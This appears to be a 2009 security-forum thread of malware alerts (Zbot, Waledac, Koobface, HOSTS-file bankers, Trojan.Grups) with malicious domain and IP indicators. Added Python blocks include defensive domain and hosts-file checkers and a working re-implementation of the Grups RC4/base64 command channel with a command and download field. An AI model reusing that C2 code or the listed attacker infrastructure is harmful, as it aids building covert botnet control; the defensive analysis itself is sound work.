- http://www.marshal8e6.com/trace/i/Zbot-In-Your-Inbox,trace.1005~.asp
June 24, 2009 - "A password stealing Zbot (ZeuS bot) Trojan has been increasingly spammed throughout the previous two weeks. We believe the spam originates from the Pushdo botnet. The spam template varies from time to time, mostly using subject lines such as “You have received a Greeting ecard ”, “Statement request”, “Microsoft outlook update”, “Postal Tracking” and may come either as an attachment or a link in the message body... Zbot attempts to download a file named "djwl.bin". This file is an encrypted configuration file..."
(Screenshots available at the URL above.)
Also see: http://www.abuse.ch/?p=1192
March 20, 2009
:fear::mad:
AplusWebMaster
2009-06-26, 15:04
FYI...
SPAM runs exploit celebrity deaths
- http://www.theregister.co.uk/2009/06/26/jackson_death_spam/
26 June 2009 - "Spammers have wasted no time exploiting the shock death of Michael Jackson to run an email harvesting campaign. Security watchers warn that malware-laced emails themed around the death of the King of Pop and Charlie's Angels star Farrah Fawcett, who also died on Thursday, are likely to follow..."
- http://securitylabs.websense.com/content/Alerts/3426.aspx
06.26.2009
- http://www.virustotal.com/analisis/67cba7b9d91e1cbcac0f22b5f4bcf12f4b07a1a62d7d3018e28ccd5ee93e0ce4-1246012313
File michael_1_.gif received on 2009.06.26 10:31:53 (UTC)
...Result: 5/41 (12.20%)
- http://www.virustotal.com/analisis/d602b5cbc6386e9ba4b7d910ff0eb04fefba5ce06ef6f703e37f76ab88ad2ff9-1246029869
File Michael.Jackson.videos.scr received on 2009.06.26 15:24:29 (UTC)
...Result: 10/41 (24.39%)
- http://www.sophos.com/blogs/sophoslabs//?p=5035
June 26, 2009
:fear::fear:
AplusWebMaster
2009-06-29, 00:19
FYI...
MSN IM - Pushdo variant...
- http://blog.trendmicro.com/msn-bot-plays-on-controversy-over-michael-jacksons-death/
June 26, 2009 - "... a slew of malicious links related to Michael Jackson’s last moments in the hospital before his death are now being proliferated in the wild via the instant messaging (IM) application, MSN... When recipients of such messages click on any of these links, they are then prompted to save a file named PIC-IMG029-www.hi5.com.exe (with the MD5 checksum of 031429fc14151f94c8651a3fb110c19b), instead of being led to an image site or gallery. Initial analysis shows that the said file is a variant of the SDBOT family...
Update - 27 June 2009: The botnet is said to push the templated messages through IRC to the client to be spammed... The malware responsible for this is detected as WORM_IRCBOT.GAT. It opens a certain port on the affected system then listens for remote commands. Kharouni reports that commands to download certain files are received and executed by the affected system, ultimately leading to the download of a PUSHDO variant. PUSHDO is a botnet responsible for a huge amount of spam activity..."
(Screenshot available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2009-06-29, 23:23
FYI...
More celebrity malware...
- http://www.f-secure.com/weblog/archives/00001709.html
June 29, 2009 - "There have been a couple of malware attacks that have tried to use the news coverage of the death of Michael Jackson as the lure to get people infected. Last night we saw this one: a file called Michael-www.google.com.exe. This file was distributed through a site called photos-google.com and possibly also through photo-msn.org, facebook-photo.net and orkut-images.com. Do not visit these sites. When executed, Michael-www.google.com.exe drops files called reptile.exe and winudp.exe. These are IRC bots with backdoor capability. The file also shows this fake error message..."
(Screenshot available at the F-secure URL above.)
- http://www.sophos.com/blogs/gc/g/2009/07/01/michael-jackson-emailaware-worm-hits-inboxes/
July 1, 2009 - "... we have encountered a mass-mailing worm that spams out messages with the following characteristics:
Subject: Remembering Michael Jackson
Attached file: Michael songs and pictures.zip
The email, which claims to come from sarah @michaeljackson.com, says that the attached ZIP file contains secret songs and photos of Michael Jackson. Opening the attachment exposes you to infection - and if your computer is hit you will be spreading the worm onto other internet users. Besides spreading via email, the malware is also capable of spreading as an Autorun component on USB memory sticks (an increasingly common trend for malware as use of these devices has become more and more popular). Sophos detects the malware proactively as Mal/ZipMal-B and Mal/VB-AD, and recommends that users of other anti-virus products ensure that their defences are properly updated..."
:fear:
AplusWebMaster
2009-07-02, 02:01
FYI...
Torrentreactor site compromised
- http://securitylabs.websense.com/content/Alerts/3430.aspx
07.01.2009 - "Websense... has detected that Torrentreactor, one of the oldest and most reliable torrent search engines on the Web, has been compromised and injected with malicious code. The site has been injected with an IFrame leading to a site laden with exploits. The exploits on the payload site include Internet Explorer (MDAC) and Microsoft Office Snapshot Viewer, as well as Acrobat Reader and Adobe Shockwave. If the user's browser is successfully exploited, a malicious file is downloaded and run from the exploit site. The malicious file has an extremely low AV detection rate*. The file (MD5: 24bd24f8673e3985fc82edb00b24ba73) is a Trojan Downloader and connects to a Bot C&C server at IP 78.109.29.116. After connecting to the IP, the file downloads a Rootkit installer from the same IP..."
* http://www.virustotal.com/analisis/0df0d26cbb793ba612236b9750309b3e545fa5339e4da159062abfe6f326b2b7-1246425266
File rncsys32.exe received on 2009.07.01 05:14:26 (UTC)
Result: 2/41 (4.88%)
- http://www.theregister.co.uk/2009/07/01/torrentreactor_breach/
1 July 2009 - "... The malicious file in the latest compromise communicates with a server at 78.109.29.116, an IP address that web searches suggest has ties to the Russian Business Network..."
:fear::spider::mad:
AplusWebMaster
2009-07-02, 22:41
FYI...
Click fraud trojan...
- http://secureworks.com/research/threats/ffsearcher/?threat=ffsearcher
June 26, 2009 - "While analyzing a slew of malware downloaded by the exploit kit used in the "Nine-Ball" web attacks, the SecureWorks Counter Threat Unit came across an interesting trojan that used a previously-unseen HTTP request pattern... After some time we came to the conclusion that the trojan was a search hijacker trojan used for click fraud. Click fraud trojans are as old as Internet advertising itself, and usually we see one of two types: browser hijackers that change one's start page and searches to redirect to a third-party search engine, or trojans that silently pull down a list of ad URLs and generate fake clicks on the ads in a hidden Internet Explorer window. This trojan however, was much more subtle and creative - in this case, every click on an ad is user-generated, and the user never notices any change in their web-surfing experience. We call this trojan search hijacker "FFSearcher", named after one of the websites used in this scheme. Detection of the dropper executable by anti-virus engines is poor at this time, with only 4 of 39 scanners* detecting it at all... As click-fraud trojans go, this is one of the more clever that we've seen, with an impressive feature set:
1. Working code to hijack both Firefox and IE
2. Difficult to spot by the average user
3. Minimally impacting to the infected machine
4. Probably difficult for fraud detection systems at the search engine sites to detect, since every ad-click that comes through is generated on purpose by a user in the course of normal web-surfing activity..."
(Screenshots available at the Secureworks URL above.)
* http://www.virustotal.com/analisis/1e7f27f88f4d63bf13267582209f13f3222552988982da2571c6af30262f6c9b-1244830834
File nkavnxe.exe received on 2009.06.12 18:20:34 (UTC)
Result: 4/39 (10.26%)
:fear::fear:
AplusWebMaster
2009-07-04, 01:08
FYI...
Happy 4th from Waledac...
- http://securitylabs.websense.com/content/Alerts/3431.aspx
07.03.2009 - "Websense... has detected yet another new Waledac campaign theme in the wild. The new variant uses an Independence Day theme as a social engineering mechanism. The USA celebrates Independence Day on July 4 each year. The malicious emails that are sent use subjects and content related to Independence Day, Fourth of July and fireworks shows. The malicious Web sites in the current attack also have a July 4 or fireworks theme within the domain name. ThreatSeeker has been monitoring the registration of these domains. Should the user click on the video, which is designed to appear to be a YouTube video, an .exe is offered. When downloaded the .exe would install the latest Waledac variant onto the user's machine..."
(Screenshots available at the URL above.)
- http://www.eset.com/threat-center/blog/?p=1244
July 2, 2009
- http://www.eset.com/threat-center/blog/?p=1250
July 3, 2009
:fear::mad::fear:
AplusWebMaster
2009-07-04, 19:51
FYI...
More on Waledac for the 4th...
- http://blog.trendmicro.com/waledac-celebrates-independence-day-too/
July 4, 2009 - "... These messages contain links to a site which appears to be from YouTube... The video supposedly shows a fabulous fireworks show, but in reality attempting to play the video results in downloading a copy of WORM_WALEDAC.DU..."
(Screenshot available at the URL above)
:fear::mad::fear:
AplusWebMaster
2009-07-06, 04:30
FYI...
Waledac July 4th update - New domains added
- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090704
4 July 2009 - "... quick update on Waledac. We have been keeping an eye on it for a bit and it's been actively spamming and updating clients to Fake Antivirus products for the last few months. However, we also saw it start spamming itself out again starting yesterday. Actually saw a quick first post on this from sudosecure.net:
http://www.sudosecure.net/archives/583
No real need to have tons of duplicate write-ups and screen shots. You can get the same basic information from the site. It's the standard spam to a link involving a fake YouTube video that wants you to download an executable... We have updated our Waledac domain lists that you can use to block/track Waledac domains. The first URL is to the list that is updated with timestamps, ugly comments, and newest domains at the bottom:
http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
We also have the all-time Waledac domain list that contains just the domain listing since the start. It currently has 244 domains on it and can be reached via the following URL:
http://www.shadowserver.org/wiki/uploads/Calendar/waledac_list.txt
These are domains you definitely want to avoid visiting and consider blocking where possible."
:fear::fear:
AplusWebMaster
2009-07-10, 16:12
FYI...
Twitter suspends Koobface infected computers
- http://blog.trendmicro.com/koobface-increases-twitter-activity/
July 9, 2009 - "... Koobface has increased its Twitter activity, sending out tweets with different URL links pointing to Koobface malware. This is in contrast with previous Koobface Twitter activity wherein only three TinyURLs pointing to Koobface were used. As of writing, there are a couple of hundred Twitter users affected by Koobface in the past few hours, but dozens more are being infected as we speak. We advise Twitter users to (not click on) URLs on tweets, especially if the tweet advertises a home video.
Update: It seems this Koobface problem in Twitter is getting bigger and bigger, prompting Twitter itself to temporarily suspend* infected user accounts."
* http://status.twitter.com/post/138789881/koobface-malware-attack
July 9, 2009 - "... If we suspend your account, we will send you an email notifying you of the suspension. This email also includes tips for removing the malware from your PC."
> http://www.sophos.com/blogs/gc/g/2009/07/10/twitter-warns-users-koobface-worm/
July 10, 2009
Preview a TinyURL
- http://tinyurl.com/preview.php
"Don't want to be instantly redirected to a TinyURL and instead want to see where it's going before going to the site? Not a problem with our preview feature..."
- http://www.threatpost.com/blogs/koobface-worm-infections-exploding
July 6, 2009 - "In June, we saw an explosive rise in the number of Koobface modifications - the number of variants we detected jumped from 324 at the end of May to nearly 1000 by the end of June. And this weekend brought another flood, bringing us up to 1049 at the time of writing... Koobface spreads via major social networking sites like Facebook and MySpace. It's now spreading via Twitter as well... the pool of potential victims is growing day by day - just take a look at the Alexa stats* for Facebook. So naturally, cybercriminals are going to be targeting these sites more and more often."
* http://www.alexa.com/siteinfo/facebook.com
"... Percent of global Internet users who visit facebook.com:
... 7 day avg: 20.01% ..."
:fear::mad::fear:
AplusWebMaster
2009-07-21, 15:06
FYI...
H1N1 SPAM w/virus...
- http://www.f-secure.com/weblog/archives/00001734.html
July 21, 2009 - "We recently saw this malicious file being spread in emails. The name of the file was Novel H1N1 Flu Situation Update.exe and the icon made it look like a Word document file. When the file was opened, it created several new files on the hard drive:
• %windir%\Temp\Novel H1N1 Flu Situation Update.doc
• %windir%\Temp\doc.exe
• %windir%\Temp\make.exe
• %windir%\system32\UsrClassEx.exe
• %windir%\system32\UsrClassEx.exe.reg
The executables contain backdoor functionality, including an elaborate keylogger. And the document file that is dropped gets automatically opened by the malware, causing the user to think he really opened a Word file..."
- http://www.sophos.com/blogs/sophoslabs/v/post/5517
July 22, 2009
(Screenshots available at both URLs above.)
:fear::mad:
AplusWebMaster
2009-07-24, 02:22
FYI...
Targeted malware calling home...
- http://www.f-secure.com/weblog/archives/00001736.html
July 23, 2009 - "In targeted attacks, we see more and more attempts to obfuscate the hostname of the server where the backdoors are connecting to. IT staff in many of the targeted organizations are fully aware of these attacks. They keep monitoring their logs for suspicious activity. The admins might spot a host that suddenly connects to known rogue locations like:
• weloveusa.3322.org
• boxy.3322.org
• jj2190067.3322.org
• hzone.no-ip.biz
• tempsys.8866.org
• zts7.8800.org
• shenyuan.9966.org
• xinxin20080628.gicp.net
However, we've now seen a shift in the hostnames. The attackers seem to be registering misleading domain names on purpose, and have now been seen using hosts with names like:
• ip2.kabsersky.com
• mapowr.symantecs.com.tw
• tethys1.symantecs.com.tw
• www.adobeupdating.com
• iran.msntv.org
• windows.redirect.hm
The apparent motive here is that a busy IT administrator might look at a firewall log alert about a machine connecting to www .adobeupdating .com and just disregard it. "That must be the PDF reader trying to download updates..." In reality, adobeupdating.com is registered to somebody in Zaire and has an IP address pointing to Australia."
:fear:
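Both the celebrity-lure domains in the F-Secure post above (photos-google.com, photo-msn.org, facebook-photo.net, orkut-images.com) and the targeted-attack hostnames in this post (ip2.kabsersky.com, mapowr.symantecs.com.tw, www.adobeupdating.com, windows.redirect.hm) work the same way: a trusted brand appears somewhere in the name while the registrable domain belongs to someone else. The following is an added example, not code from the original posts or from F-Secure, of the check a firewall-log reviewer would want: reduce each destination to its registrable domain, accept it only if that domain is on the brand's allowlist, and otherwise flag brand substrings and near-misspellings. The brand allowlist, the public-suffix table and the log lines are constructed for the example; a real deployment would use the Public Suffix List and its own vendor inventory.

```python
import re

# Brand -> registrable domains that legitimately belong to it (constructed allowlist).
BRAND_DOMAINS = {
    "google":    {"google.com"},
    "msn":       {"msn.com"},
    "facebook":  {"facebook.com"},
    "orkut":     {"orkut.com"},
    "adobe":     {"adobe.com"},
    "symantec":  {"symantec.com"},
    "kaspersky": {"kaspersky.com"},
    "windows":   {"microsoft.com", "windowsupdate.com", "windows.com"},
}

# Dynamic-DNS providers appearing in the first hostname list above.
DYNDNS = {"3322.org", "8866.org", "8800.org", "9966.org", "no-ip.biz", "gicp.net"}

# Two-label public suffixes: an assumption sized for the sample, not the real Public Suffix List.
TWO_LABEL_SUFFIXES = {"com.tw", "co.uk", "com.br", "com.au"}

LOG_RE = re.compile(r"dst_host=(\S+)")  # field name assumed for the constructed log format


def registrable_domain(host):
    """'mapowr.symantecs.com.tw' -> 'symantecs.com.tw'; 'www.adobeupdating.com' -> 'adobeupdating.com'."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def levenshtein(a, b):
    """Edit distance, used to catch one- or two-character misspellings of a brand."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host):
    """Return (verdict, reason); verdict is ok, dynamic-dns, lookalike or unknown."""
    host = host.lower().rstrip(".")
    reg = registrable_domain(host)
    label = reg.split(".")[0]
    for brand, legit in BRAND_DOMAINS.items():
        if reg in legit:
            return "ok", f"{reg} belongs to {brand}"
    if reg in DYNDNS:
        return "dynamic-dns", f"{reg} is a dynamic-DNS provider"
    for brand in BRAND_DOMAINS:
        # Brand name anywhere in the host, but the registrable domain is not the brand's.
        if brand in host:
            return "lookalike", f"contains '{brand}' but registrable domain is {reg}"
        # Misspelled brand as the registrable label (kabsersky vs kaspersky); short
        # brands are excluded because two edits would match far too much.
        if len(brand) >= 6 and len(label) >= 6 and levenshtein(label, brand) <= 2:
            return "lookalike", f"'{label}' is within 2 edits of '{brand}'"
    return "unknown", reg


def scan_firewall_log(lines):
    """Return (host, verdict, reason) for every destination that is not on the allowlist."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            verdict, reason = classify_host(m.group(1))
            if verdict != "ok":
                hits.append((m.group(1), verdict, reason))
    return hits


SAMPLE_LOG = [  # constructed lines, not a real capture
    "2009-07-23 09:58:01 src=10.1.4.22 dst_host=get.adobe.com dport=80 action=allow",
    "2009-07-23 10:02:11 src=10.1.4.22 dst_host=www.adobeupdating.com dport=80 action=allow",
    "2009-07-23 10:02:40 src=10.1.4.22 dst_host=ip2.kabsersky.com dport=443 action=allow",
    "2009-07-23 10:05:03 src=10.1.4.31 dst_host=mapowr.symantecs.com.tw dport=80 action=allow",
    "2009-07-23 10:06:17 src=10.1.4.31 dst_host=tempsys.8866.org dport=8080 action=allow",
    "2009-07-23 10:07:55 src=10.1.4.31 dst_host=photos-google.com dport=80 action=allow",
]

if __name__ == "__main__":
    for host, verdict, reason in scan_firewall_log(SAMPLE_LOG):
        print(f"{verdict:12} {host:28} {reason}")
```

The allowlist check comes first on purpose: "contains a brand name" is only evidence once the registrable domain has failed to match, otherwise every legitimate get.adobe.com lookup would be noise.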
AplusWebMaster
2009-07-31, 19:27
FYI...
Dilbert sends out 419 scams...
- http://www.sophos.com/blogs/sophoslabs/v/post/5633
July 29, 2009 - "... Advance Fee fraud scammers will abuse any free service they can get their hands on to send out their spam messages... In recent days, a group of Nigerian scammers have started abusing the “share-a-comic-strip” feature on Dilbert.com. The scammers do this by including their own fraud message inside the “personal message” portion of the sent messages. This is probably a money-making scheme that Dogbert would approve of..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2009-08-12, 14:23
FYI...
PayPal fraud with CAPTCHA
- http://blog.trendmicro.com/paypal-fraud-with-captcha/
Aug. 11, 2009 - "... CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) used to protect web sites against abusive automated software that can register, spam, login, or even splog. However, nowadays that isn’t the case anymore. Just like the traditional PayPal phish, the web page http ://{BLOCKED}www.security-paypal.citymax.com /paypal_security.html asks the user to provide feedback from their Shopping by asking for their Name, E-mail Address and PayPal password... After which, a CAPTCHA image is shown and requires the user to enter the code indicated for spam prevention. However, after entering the user’s personal information, this could be used to create bogus mail accounts, among other things..."
(Screenshot available at the URL above.)
:mad:
AplusWebMaster
2009-08-14, 14:47
FYI...
Spam changes HOSTS file...
- http://blog.trendmicro.com/brazil-spam-changing-a-hosts-file/
Aug. 14, 2009 - "We have recently detected a new spam attack that attempts to grab the bank data of Brazilian users. The mechanics of this attack are simple. Users receive this spam email... The mail claims that the user has received an e-card, and contains a link to “read” the said card. Clicking on the related link, a file is downloaded and executed... Apparently nothing happens, just an Internet Explorer window is opened showing a related web card from this initial phishing. In the background, however, the HOSTS file is changed, and set to redirect certain Brazilian banking Web sites to a malicious web site. All information posted in any of the said pages will then be grabbed by the attacker..."
(Screenshots available at the URL above.)
:fear:
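A HOSTS-file override of a banking domain is silent to the user but trivial to spot from the file itself: a name that should resolve on the public Internet is pinned to an address that is neither loopback, unspecified nor on the local network. The following is an added example, not code from the original post or from Trend Micro, that audits a hosts file on that basis and separately flags any entry touching a watch list of domains that must never be overridden. The hosts content, the watch-list domains (under the reserved .example TLD) and the TEST-NET address 203.0.113.17 are all constructed for the example. RFC 1918 ranges are listed explicitly rather than via `is_private`, because Python counts the documentation ranges as private and would hide exactly the sample we want to catch.

```python
import ipaddress

LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost", "ip6-localhost", "ip6-loopback"}
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]

# Constructed watch list: domains your users must always reach via real DNS.
WATCHED = {"yourbank.example", "otherbank.example"}

# Constructed hosts file, not a real capture. Lines 6 and 7 are the kind of entry
# the Brazilian e-card Trojan writes.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.0.0.5        intranet.corp.local     # admin-managed internal override
0.0.0.0         ads.tracker.example     # ad-blocking sinkhole, harmless
203.0.113.17    www.yourbank.example
203.0.113.17    secure.yourbank.example internetbanking.yourbank.example
"""


def is_local_target(addr):
    """Loopback, unspecified (0.0.0.0 sinkholes), link-local or RFC 1918 private space."""
    if addr.is_loopback or addr.is_unspecified or addr.is_link_local:
        return True
    return any(addr in net for net in RFC1918)


def is_watched(name):
    return any(name == w or name.endswith("." + w) for w in WATCHED)


def audit_hosts(text):
    """Return one finding per suspicious line: {line, ip, names, reasons}."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        body = raw.split("#", 1)[0].strip()       # drop comments
        if not body:
            continue
        fields = body.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            findings.append({"line": lineno, "ip": fields[0], "names": fields[1:],
                             "reasons": ["unparseable address"]})
            continue
        names = [n.lower() for n in fields[1:]]
        reasons = []
        hits = [n for n in names if is_watched(n)]
        if hits:
            reasons.append("overrides watched domain(s): " + ", ".join(hits))
        if not is_local_target(addr) and any(n not in LOCAL_NAMES for n in names):
            reasons.append(f"maps hostnames to non-local address {addr}")
        if reasons:
            findings.append({"line": lineno, "ip": str(addr), "names": names, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_hosts(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['ip']} {' '.join(f['names'])} -> {'; '.join(f['reasons'])}")
```

On Windows the file is %SystemRoot%\system32\drivers\etc\hosts; feed its contents to `audit_hosts` as-is. Either rule alone would have caught this campaign; the watch list is there so that a future variant pointing the bank at an internal or loopback address still trips an alert.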
AplusWebMaster
2009-08-20, 18:33
FYI...
Facebook apps used for phishing
- http://blog.trendmicro.com/facebook-applications-used-for-phishing/
Aug. 19, 2009 - "It would be easy to think that once someone has logged in successfully to Facebook—and not a phishing site—that the security threat is largely gone. However, that’s not quite the case, as we’ve seen before*. Earlier this week, however, Trend Micro... found at least two—if not more—malicious applications on Facebook. (These were the Posts and Stream applications.) They were used for a phishing attack that sent users to a known phishing domain, with a page claiming that users need to enter their login credentials to use the application. The messages appear as notifications in a target user’s -legitimate- Facebook profile... While Trend Micro has informed Facebook of these findings, users should still exercise caution when entering login credentials. They should be doubly sure that these are being entered into legitimate sites, and not carefully crafted phishing sites..."
* http://blog.trendmicro.com/?s=Koobface
(Screenshots available at the URL at the top listed above.)
:fear::mad::spider:
AplusWebMaster
2009-08-24, 13:20
FYI...
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=219401053
Aug. 21, 2009 - "... According to new data collected by ScanSafe, which filters more than a billion Web queries each month, some 76 percent of companies are now blocking social networking sites - a 20 percent increase over the past six months. More companies now block social networking sites than block Webmail (58 percent), online shopping (52 percent), or sports sites (51 percent), ScanSafe says*. "Social networking sites can expose businesses to malware, and if not used for business purposes, can be a drain on productivity and bandwidth," says Spencer Parker, director of product management at ScanSafe... Companies are also increasing their restrictions on other types of sites, including travel, restaurants, and job hunting sites, according to the data..."
* http://www.scansafe.com/news/press_releases/press_releases_2009/employers_crack_down_on_social_networking_use
.
AplusWebMaster
2009-09-06, 14:08
FYI...
Swine flu SPAM leads to malware
- http://blog.trendmicro.com/fake-presidential-swine-flu-stories-lead-to-malware/
Sep. 5, 2009 - "No one is absolutely safe from Influenza H1N1, not even world leaders. This is the scenario painted by cybercriminals in their latest spam run. The spammed message informs recipients that the President of Peru, Alan Gabriel Ludwig García Pérez, and other attendees of the delegation of UNASUR (Union of South American Nations) summit have confirmed cases of Swine flu. Furthermore, it states that the presidents of Brazil and Bolivia were also both infected but are now recovering... Written in Spanish, the spam attempts to stir recipients’ curiosity by saying that the incident is being kept from the public. It also urges them to click on the malicious link, which purports to contain the audio news pertaining to this incident. Instead of news, however, all victims get is an executable file ( Alan.Gripe.Porcina.mp3 .exe ) detected by Trend Micro as TSPY_BANCOS.AEM. BANCOS variants are known for their info-stealing capabilities..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2009-09-08, 16:05
FYI...
Koobface attacks on Facebook and MySpace...
- http://www.associatedcontent.com/article/2148665/rumored_fan_check_virus_scares_facebook.html?cat=15
September 07, 2009 - "Rumors of a Fan Check virus have circulated in the Facebook community. The Kaspersky Lab* [reports] two variants of Koobface viruses which (for now) are only attacking Facebook and MySpace users... As a Facebook user, it's important to remember not to open suspicious links, even if they are from "friends".... had problems in the past with hackers using my friends' accounts to spam or to send viruses. One of the current links is to a YouTube video and a message asking the users to update to the latest version of Flash Player. By clicking, the user will have effectively downloaded a worm..."
* http://www.kaspersky.com/news?id=207575670
- http://www.eset.com/threat-center/blog/2009/09/08/fan-check-fretting-about-facebook
September 8, 2009 - "... Quite a few people are talking about Fan Check at the moment, but mostly in the context of the "Facebook Fan Check Virus" hoax: briefly, the bad guys are using SEO poisoning to ensure that if you look for search terms like "Facebook Fan Check Virus" in a search engine, some of the top-ranking hits you get will be to sites that will try to trick you into downloading a rogue anti-malware application..."
:fear::fear:
AplusWebMaster
2009-09-10, 15:14
FYI...
Bogus work-at-home schemes...
- http://voices.washingtonpost.com/securityfix/2009/09/cyber_theives_steal_447000_fro.html
September 9, 2009 - "Organized cyber thieves are increasingly looting businesses in heists that can net hundreds of thousands of dollars. Security vendors and pundits may be quick to suggest a new layer of technology to thwart such crimes, but in a great many cases, the virtual robbers are foiled because an alert observer spotted something amiss early on and raised a red flag. In mid-July, computer crooks stole $447,000 from Ferma Corp., a Santa Maria, Calif.-based demolition company, by initiating a large batch of transfers from Ferma's online bank account to 39 "money mules," willing or unwitting accomplices who typically are ensnared via job search Web sites into bogus work-at-home schemes..."
:fear::mad:
AplusWebMaster
2009-09-12, 05:24
FYI...
Google Groups trojan
- http://www.symantec.com/connect/blogs/google-groups-trojan
September 11, 2009 - "... A back door Trojan that we are calling Trojan.Grups* has been using the Google Groups newsgroups to distribute commands. Trojan distribution via newsgroups is relatively common, but this is the first instance of newsgroup C&C usage that Symantec has detected. It’s worth noting that Google Groups is not at fault here; rather, it is a neutral party. The authors of this threat have chosen Google Groups simply for its bevy of features and versatility. The Trojan itself is quite simple. It is distributed as a DLL, and when executed will log onto a specific account:
Escape[REMOVED]@gmail.com
h0[REMOVED]t
The Web-based newsgroup can store both static “pages” and postings. When successfully logged in, the Trojan requests a page from a private newsgroup, escape2sun. The page contains commands for the Trojan to carry out. The command consists of an index number, a command line to execute, and optionally, a file to download. Responses are uploaded as posts to the newsgroup using the index number as a subject. The post and page contents are encrypted using the RC4 stream cipher and then base64 encoded. The attacker can thus issue confidential commands and read responses. If no command is received from the static page, the infected host uploads the current time."
* http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-091013-5214-99&tabid=2
:fear::mad:
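The Symantec write-up above describes the Trojan.Grups command channel precisely enough to model it: commands are fetched from a static newsgroup page, each carrying an index number, a command line and an optional file to download; responses are posted with the index as the subject; page and post bodies are RC4-encrypted and then base64-encoded, and an idle bot posts the current time. The following is an added example, not Symantec's analysis code or the malware's own, that implements that exchange end to end so the shape of the traffic is visible. The key and the newline-delimited field layout are assumptions; the write-up names the fields but not their delimiters.

```python
import base64
import time

KEY = b"hypothetical-key"  # assumption: the real key lives inside the DLL


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wrap(key: bytes, plaintext: bytes) -> str:
    """RC4 then base64: what ends up on the newsgroup page or in a post body."""
    return base64.b64encode(rc4(key, plaintext)).decode("ascii")


def unwrap(key: bytes, blob: str) -> bytes:
    return rc4(key, base64.b64decode(blob))


# --- controller side: the static page -----------------------------------------
def encode_command(key, index, cmdline, download_url=""):
    """Layout assumption: index, command line, optional URL, newline-separated."""
    return wrap(key, f"{index}\n{cmdline}\n{download_url}".encode())


def read_response(key, body):
    return unwrap(key, body).decode()


# --- bot side: the infected host ----------------------------------------------
def decode_command(key, page_blob):
    index, cmdline, url = unwrap(key, page_blob).decode().split("\n", 2)
    return int(index), cmdline, (url or None)


def build_response(key, index, output):
    """Post subject is the command index; the body is the encrypted output."""
    return str(index), wrap(key, output.encode())


def idle_beacon(key, now=None):
    """With no command on the page the bot uploads the current time (subject assumed)."""
    stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(now))
    return "beacon", wrap(key, stamp.encode())


if __name__ == "__main__":
    page = encode_command(KEY, 7, "ipconfig /all", "http://example.invalid/update.exe")
    print("page body as seen on the wire:", page)
    idx, cmd, url = decode_command(KEY, page)
    subject, body = build_response(KEY, idx, "Windows IP Configuration ... (constructed output)")
    print("post subject:", subject, "| controller reads:", read_response(KEY, body))
```

Everything an observer sees on the Google Groups side is a base64 blob, so content inspection gives nothing without the key; the detectable part of this design is the behaviour around it, a host logging in to a single Gmail account and polling one private group on a fixed cadence.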
AplusWebMaster
2009-09-14, 15:45
FYI...
Cyber Crooks Target Public & Private Schools
- http://voices.washingtonpost.com/securityfix/2009/09/cyber_mob_targets_public_priva.html
September 14, 2009; 8:00 AM ET - "A gang of organized cyber criminals that has stolen millions from businesses across the United States over the past month appears to have turned its sights on public schools and universities... Each of the transfers was kept just below $10,000 to avoid banks' anti-money laundering reporting requirements, and went out to at least 17 different accomplices or "money mules" that the attackers had hired via work-at-home job scams... With the help of the victims interviewed in this story, Security Fix was able to track down mules who said they were involved in each of the scams. All said they had been recruited via e-mail to sign up as "financial agents" at a company called Focus Group Inc. According to a write-up* by money mule site tracker Bob Harrison, the Focus Group Web site may look legit, but is "just the latest of the numerous highly generic Russian scam websites that has been set up to form a front for a money laundering fraud job advertisement."
* http://www.bobbear.co.uk/focus-group-inc.html
:fear::mad:
AplusWebMaster
2009-09-19, 17:35
FYI...
PBS site hacked - used to serve exploits
- http://www.threatpost.com/blogs/pbs-website-compromised-used-serve-exploits-118
September 18, 2009 - "Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits. According to researchers at Purewire*, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe. The malicious JavaScript was found on the "Curious George" page that provides content on the popular animation series. A look at the code on the hijacked site shows malicious activity coming from a third-party .info domain. The URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015)..."
* http://blog.purewire.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits
:fear::mad:
AplusWebMaster
2009-09-22, 01:49
FYI...
Monopoly Game malware...
- http://securitylabs.websense.com/content/Alerts/3481.aspx
